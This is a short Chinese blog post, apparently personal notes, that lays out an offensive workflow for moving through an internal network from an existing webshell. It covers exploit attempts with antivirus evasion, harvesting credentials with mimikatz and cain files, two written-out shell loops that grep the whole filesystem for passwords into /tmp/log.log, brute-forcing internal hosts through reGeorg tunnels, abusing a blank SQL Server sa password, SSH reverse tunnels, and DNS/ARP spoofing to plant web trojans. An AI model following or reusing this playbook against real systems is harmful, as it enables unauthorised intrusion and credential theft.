内网渗透流程

on under web
1 minute read

假设已有webshell,无本地管理员权限

Step0 获取本地管理员权限

  • 各种exp尝试,如果失败免杀再试
  • 本机配置文件,敏感文件查找
    • win下:
      • 数据库等配置文件,脚本在这里
      • psexec.exe[找文本内容为-u xx\xxx -p xxx的文件]
      • cain.exe[找pop3.lst,http.lst,smtp.lst,ftp.lst文件]
      • mimikatz.exe[找mimikatz.txt]
      • win下找文件可参考这里
    • linux下:
      for suffix in  *history *record *.csv *.sql *.bak *.py *.txt *.pl *.xml *.md *.json *.config *.php *.asp *.jsp *.aspx *.ini *.inc *.reg *.doc *.docx *.xls *.xlsx *.pdf;do locate $suffix|xargs grep -r -E “(password=)|(password:)|(password =)|(password :)|(passwd=)|(passwd:)|(passwd =)|(passwd :)” >> /tmp/log.log;done
    
      无locate时:
      for suffix in *history *record *.csv *.sql *.bak *.py *.txt *.pl *.xml *.md *.json *.config *.php *.asp *.jsp *.aspx *.ini *.inc *.reg *.doc *.docx *.xls *.xlsx *.pdf;do find / -name $suffix|xargs grep -r -E “(password=)|(password:)|(password =)|(password :)|(passwd=)|(passwd:)|(passwd =)|(passwd :)” >> /tmp/log.log;done
    
      (grep中有-r是因为find也会找出符合条件的文件夹名,-r表示递归查找文件夹中文件,用于在find找到文件夹名时的情况)
    
  • 内网机器扫描开放端口情况,弱口令爆破 (webshell下或reGeorg代理后用扫描器扫,如果失败则用msf生成马上传后用扫描模块,或者用hydra for win,或者用hscan, 或者用scanline,或者用superscan命令行,优选scanline) eg.扫到一台1433 sa空口令,可用:
    • 菜刀中配置数据库连接并在菜刀中通过数据库执行命令,有时这个会失败,可能是菜刀的问题,如果失败可用下面3种
    • sqltools在proxyfier+reGeorg下执行命令,参考这里,(用前要谨慎,或许有毒)
    • navicat在proxyfier+reGeorg下执行菜刀中的数据库查询命令
    • ssh反向代理[需要有一台公网ip机器开ssh服务,可在目标机器不能使用reGeorg等socket转发脚本时使用],参考这里 (win开ssh服务参考这里)

Step 1 获取域控管理员权限

  • 1.找域控
  • 2.找域控登录过的机器
  • 3.抓密码
  • 4.嗅探口令
  • 5.dns+arp欺骗布置网马
域渗透, 内网渗透
home
github
archive
category